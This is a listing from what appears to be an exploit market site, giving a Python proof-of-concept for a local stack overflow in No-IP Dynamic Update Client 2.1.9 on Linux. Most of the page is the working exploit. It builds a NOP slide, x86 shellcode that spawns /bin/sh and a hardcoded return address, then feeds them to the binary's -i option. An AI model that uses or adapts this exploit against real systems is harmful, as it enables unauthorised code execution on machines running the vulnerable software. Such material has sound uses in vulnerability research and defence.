[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow

Author
Alberto Ortega
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-20764
Category
dos / poc
Date add
13-05-2013
Platform
linux
import os
 
binary = "./noip-2.1.9-1/binaries/noip2-i686"
 
shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"\
            "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"\
            "\x80\xe8\xdc\xff\xff\xff/bin/sh"
 
nop = "\x90"
nop_slide = 296 - len(shellcode)
 
# (gdb) print &IPaddress
# $2 = (<data variable, no debug info> *) 0x80573bc
eip_addr = "\xbc\x73\x05\x08"
 
print "[*] Executing %s ..." % (binary)
 
os.system("%s -i %s%s%s" % (binary, nop*nop_slide, shellcode, eip_addr))

#  0day.today [2024-12-24]  #